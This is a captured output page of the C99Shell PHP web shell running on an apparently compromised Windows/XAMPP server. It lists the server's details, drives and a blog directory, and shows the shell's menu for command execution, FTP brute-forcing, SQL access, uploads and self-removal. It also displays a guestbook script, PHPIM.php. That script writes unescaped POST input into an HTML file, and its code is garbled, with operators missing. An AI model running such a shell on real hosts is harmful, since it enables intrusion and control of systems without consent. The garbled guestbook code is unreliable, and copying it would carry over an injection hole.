!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\blog\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PHPIM.php (758 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?PHP

$name " " $_POST['theName'];
$message " " $_POST['theMessage'];

//$name = "bobby";
//$message = "I pwn harcore";

if($myFile fopen("guestBook.txt","r"))
{
    $myString fgets($myFile);//get everything in the txt b4 it is deleted
    fclose($myFile);
}

if($myFile fopen("guestBook.txt","w"))//this time write the file
{
    fwrite($myFile$myString $name ":" $message "<BR>"); //deletes everything in the txt file and then adds it again
    fclose($myFile);
    $sentOk true;
    echo "sentOk=" $sentOk
}

//we already know that we can read the file so--- meh copy and paste is easier

if($myFile fopen("guestBook.txt","r"))
{
    $myString fgets($myFile);//variables b4 the deletion    
    print($myString);
}    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--